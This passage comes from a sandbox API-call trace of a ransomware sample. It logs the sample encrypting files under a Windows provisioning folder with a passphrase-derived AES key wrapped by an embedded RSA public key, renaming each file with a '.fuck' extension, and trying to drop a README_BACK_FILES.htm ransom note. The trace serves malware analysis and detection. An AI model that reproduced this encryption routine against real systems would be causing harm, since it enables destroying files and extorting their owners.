dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.747] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.747] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2858d98) returned 1 [0237.750] CryptCreateHash (in: hProv=0x2858d98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.750] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.750] CryptHashData (hHash=0x2846820, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.750] CryptDeriveKey (in: hProv=0x2858d98, Algid=0x6610, hBaseData=0x2846820, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846720) returned 1 [0237.750] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.750] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.750] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2858c00) returned 1 [0237.751] CryptImportPublicKeyInfo (in: hCryptProv=0x2858c00, dwCertEncodingType=0x1, pInfo=0x284fe88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284feb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284fec0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2846620) returned 1 [0237.751] CryptEncrypt (in: hKey=0x2846620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.751] CryptEncrypt (in: hKey=0x2846620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28587c0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28587c0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.751] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28587c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.751] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2860988, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.751] CryptEncrypt (in: hKey=0x2846720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.751] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.751] CloseHandle (hObject=0xffffffff) returned 1 [0237.751] CloseHandle (hObject=0xffffffff) returned 1 [0237.751] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml"), bFailIfExists=0) returned 0 [0237.752] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml", dwFileAttributes=0x0) returned 0 [0237.752] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.gsg")) returned 0 [0237.752] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.fuck")) returned 0 [0237.752] CryptDestroyHash (hHash=0x2846820) returned 1 [0237.752] CryptDestroyKey (hKey=0x2846720) returned 1 [0237.753] CryptReleaseContext (hProv=0x2858d98, dwFlags=0x0) returned 1 [0237.753] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.753] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.753] GetLastError () returned 0x5 [0237.753] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml")) returned 0x20 [0237.753] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml", dwFileAttributes=0x80) returned 0 [0237.753] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.753] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.754] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.754] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2858160) returned 1 [0237.756] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.756] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.756] CryptHashData (hHash=0x2846aa0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.756] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2846aa0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28466e0) returned 1 [0237.757] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.757] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.757] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2858848) returned 1 [0237.757] CryptImportPublicKeyInfo (in: hCryptProv=0x2858848, dwCertEncodingType=0x1, pInfo=0x284ff58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284ff88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284ff90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28465a0) returned 1 [0237.757] CryptEncrypt (in: hKey=0x28465a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.757] CryptEncrypt (in: hKey=0x28465a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857f40*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2857f40*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.757] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857f40, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.757] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2860988, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.758] CryptEncrypt (in: hKey=0x28466e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.758] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.758] CloseHandle (hObject=0xffffffff) returned 1 [0237.758] CloseHandle (hObject=0xffffffff) returned 1 [0237.758] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml"), bFailIfExists=0) returned 0 [0237.758] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml", dwFileAttributes=0x0) returned 0 [0237.758] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.gsg")) returned 0 [0237.759] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.fuck")) returned 0 [0237.759] CryptDestroyHash (hHash=0x2846aa0) returned 1 [0237.759] CryptDestroyKey (hKey=0x28466e0) returned 1 [0237.759] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.759] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.759] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.759] GetLastError () returned 0x5 [0237.759] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml")) returned 0x20 [0237.760] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml", dwFileAttributes=0x80) returned 0 [0237.760] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.761] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.761] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.761] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2858958) returned 1 [0237.764] CryptCreateHash (in: hProv=0x2858958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.764] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.764] CryptHashData (hHash=0x2846660, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.764] CryptDeriveKey (in: hProv=0x2858958, Algid=0x6610, hBaseData=0x2846660, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846ba0) returned 1 [0237.764] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.764] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.764] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2858e20) returned 1 [0237.765] CryptImportPublicKeyInfo (in: hCryptProv=0x2858e20, dwCertEncodingType=0x1, pInfo=0x2850028*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850058*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850060*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2846be0) returned 1 [0237.765] CryptEncrypt (in: hKey=0x2846be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.765] CryptEncrypt (in: hKey=0x2846be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858d98*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2858d98*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.765] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858d98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.765] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2860988, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.765] CryptEncrypt (in: hKey=0x2846ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2860988*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.765] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2860988, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.765] CloseHandle (hObject=0xffffffff) returned 1 [0237.765] CloseHandle (hObject=0xffffffff) returned 1 [0237.765] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml"), bFailIfExists=0) returned 0 [0237.766] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml", dwFileAttributes=0x0) returned 0 [0237.766] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.gsg")) returned 0 [0237.766] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.fuck")) returned 0 [0237.766] CryptDestroyHash (hHash=0x2846660) returned 1 [0237.767] CryptDestroyKey (hKey=0x2846ba0) returned 1 [0237.767] CryptReleaseContext (hProv=0x2858958, dwFlags=0x0) returned 1 [0237.767] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.767] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.767] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.767] AreFileApisANSI () returned 1 [0237.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2858d10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.767] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.767] GetLastError () returned 0x5 [0237.767] GetLastError () returned 0x5 [0237.768] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.768] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.768] GetLastError () returned 0x5 [0237.768] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml")) returned 0x20 [0237.768] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.768] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.768] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.769] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.769] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2858958) returned 1 [0237.771] CryptCreateHash (in: hProv=0x2858958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.771] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.771] CryptHashData (hHash=0x2845de0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.771] CryptDeriveKey (in: hProv=0x2858958, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2846660) returned 1 [0237.771] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 